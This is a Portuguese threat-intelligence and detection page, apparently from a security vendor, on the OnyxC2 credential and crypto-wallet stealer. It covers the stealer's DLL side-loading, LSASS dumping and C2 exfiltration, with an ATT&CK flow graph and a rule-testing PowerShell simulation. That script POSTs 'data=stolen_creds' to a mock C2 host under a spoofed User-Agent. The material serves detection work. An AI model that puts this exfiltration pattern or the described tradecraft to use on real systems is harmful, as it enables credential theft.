Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
OnyxC2 é um malware emergente como serviço projetado para roubar credenciais, extensões de autenticação de dois fatores e carteiras de criptomoedas em cerca de 210 aplicativos. A plataforma oferece um kit de ferramentas completo no estilo comercial, incluindo um painel de gerenciamento, criador e funcionalidade de acesso remoto. Também se baseia em métodos avançados de evasão, incluindo carregamento lateral de DLL com binários assinados de tamanho excessivo e componentes de carga útil criptografados.
Investigação
Pesquisadores da BlackFog examinaram várias amostras de OnyxC2 e descobriram um método de carregamento lateral de DLL que abusa de um executável host assinado junto com uma DLL maliciosa de mais de 120 MB disfarçada como uma biblioteca gráfica da NVIDIA. A análise de rede mostrou o malware se comunicando via HTTPS com um endpoint específico da API backend. Os pesquisadores também encontraram sobreposições criptografadas embutidas na DLL, ajudando o malware a evitar análises estáticas diretas.
Mitigação
Implantar controles de anti-exfiltração de dados no endpoint pode ajudar a bloquear tráfego de saída não autorizado, independentemente de qual processo é usado. As equipes de segurança devem monitorar carregamentos suspeitos de DLL associados a binários assinados e investigar arquivos incomumente grandes que aparecem em caminhos graváveis pelo usuário. Também são recomendadas políticas fortes de controle de aplicativos e monitoramento de tarefas agendadas não autorizadas.
Resposta
Se for detectada atividade do OnyxC2, isole o sistema afetado imediatamente para interromper o roubo de dados. Capture um dump completo de memória para recuperar a carga útil descriptografada e verifique sessões HVNC ativas ou atividade de proxy SOCKS5. Revise todas as tarefas agendadas criadas recentemente e inspecione as lojas de credenciais do navegador em busca de evidências de comprometimento.
graph TB %% Definições de classes classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% Acesso inicial e execução action_user_exec[“<b>Ação</b> – <b idea=’T1204.002’>Execução pelo Usuário: Arquivo Malicioso</b><br/>Descrição: As vítimas são induzidas a baixar<br/>arquivos protegidos por senha contendo<br/>instaladores maliciosos disfarçados de software legítimo.”] class action_user_exec action action_side_loading[“<b idea=’T1574.002’>Sequestro do Fluxo de Execução: DLL Side-Loading</b><br/>Descrição: Utiliza um executável legítimo e assinado digitalmente<br/>para carregar uma DLL maliciosa e inflada<br/>chamada borlndmm.dll.”] class action_side_loading action malware_dll[“<b idea=’T1027.001’>Arquivos ou Informações Ofuscadas: Preenchimento Binário</b><br/>Descrição: A DLL é inflada para mais de 120 MB com<br/>funções legítimas de gráficos NVIDIA para<br/>evadir mecanismos de segurança.”] class malware_dll malware %% Persistência e comando e controle action_persistence[“<b idea=’T1547’>Persistência</b><br/>Descrição: Emprega capacidades opcionais de<br/>execução automática por meio de tarefas agendadas.”] class action_persistence action action_c2[“<b idea=’T1071.001’>Comando e Controle: Protocolo de Camada de Aplicação</b><br/>Descrição: Comunicação periódica com o backend via HTTPS em<br/>/backend/api/app.php, frequentemente utilizando Cloudflare<br/>como intermediário para aumentar a furtividade.”] class action_c2 action %% Descoberta e acesso a credenciais action_discovery[“<b idea=’T1217’>Descoberta</b><br/>Descrição: Coleta informações de navegadores, incluindo<br/>logins salvos e cookies de 45 navegadores<br/>baseados em Chromium e Gecko.”] class action_discovery discovery action_cred_mgr[“<b idea=’T1555.005’>Acesso a Credenciais: Credenciais de Gerenciadores de Senhas</b><br/>Descrição: Tem como alvo 5 aplicativos diferentes de<br/>gerenciamento de senhas para roubo de credenciais.”] class action_cred_mgr discovery action_lsass[“<b idea=’T1003.001’>Acesso a Credenciais: Dump de Credenciais do Sistema Operacional</b><br/>Descrição: Realiza dump da memória do LSASS para obter<br/>credenciais.”] class action_lsass discovery %% Exfiltração action_exfil[“<b idea=’T1041’>Exfiltração pelo Canal de C2</b><br/>Descrição: Dados roubados, incluindo senhas, cookies<br/>e informações de carteiras, são enviados por meio da<br/>requisição action=up_d.”] class action_exfil exfiltration %% Fluxo de conexões action_user_exec –>|leva_a| action_side_loading action_side_loading –>|utiliza| malware_dll malware_dll –>|estabelece| action_persistence action_persistence –>|inicia| action_c2 action_c2 –>|aciona| action_discovery action_discovery –>|leva_a| action_cred_mgr action_discovery –>|leva_a| action_lsass action_cred_mgr –>|fornece_dados_para| action_exfil action_lsass –>|fornece_dados_para| action_exfil action_exfil –>|comunica_se_por| action_c2
Fluxo de Ataque
Detecções
Comando e Controle Suspeito por Solicitação de DNS de Domínio de Nível Superior (TLD) Incomum (via dns)
Ver
IOCs (HashSha256) para detectar: Inside OnyxC2: O Novo Roubo Alvo de 210 Apps
Ver
IOCs (SourceIP) para detectar: Inside OnyxC2: O Novo Roubo Alvo de 210 Apps
Ver
IOCs (DestinationIP) para detectar: Inside OnyxC2: O Novo Roubo Alvo de 210 Apps
Ver
Detecção da Comunicação C2 do OnyxC2 Stealer e Anonimização TOR [Proxy]
Ver
Detecção de Execução Automática de Tarefas Agendadas e Atividade de Keylogger do OnyxC2 [Criação do Processo Windows]
Ver
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria & Referência deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a erros de diagnóstico.
-
Narrativa e Comandos do Ataque: O adversário busca exfiltrar credenciais de navegador roubadas. Para evitar a detecção pelo monitoramento de segurança da rede, eles implantam um binário Tor portátil para criar um túnel anonimizado. Uma vez estabelecido o túnel, o malware inicia uma conexão com o seu servidor de Comando e Controle (C2). Para se misturar ao tráfego web legítimo, o malware disfarça seu User-Agent para parecer “Cloudflare” e visa um endpoint específico da API hospedado atrás de um proxy Cloudflare. Esta sequência é projetada para acionar a correlação da regra de detecção de
torargumentos de linha de comando e o específico/backend/api/app.phppadrão de URL. -
Script de Teste de Regressão:
# Simulação da Comunicação de Roubo do OnyxC2 # 1. Simular a presença do Tor (Criando um comportamento de arquivo/processo fictício) # Em um cenário real, este seria o tor.exe real $TorPath = "$env:TEMPtor.exe" "Conteúdo Binário Simulado do Tor" | Out-File -FilePath $TorPath # Criar um evento de execução de processo para 'tor' via linha de comando Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo rodando serviço tor" -WindowStyle Hidden # Para garantir que a lógica de detecção 'command_line|contains: tor' seja ativada, # executamos um comando que inclui a string 'tor' cmd.exe /c "echo inicializando proxy tor..." # 2. Simular a Conexão de Rede C2 # Usamos PowerShell para simular uma conexão de rede com o URL e User-Agent específicos $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Tentando comunicação C2 para $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Comandos de Limpeza:
# Remover artefatos simulados Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Limpeza da simulação completa."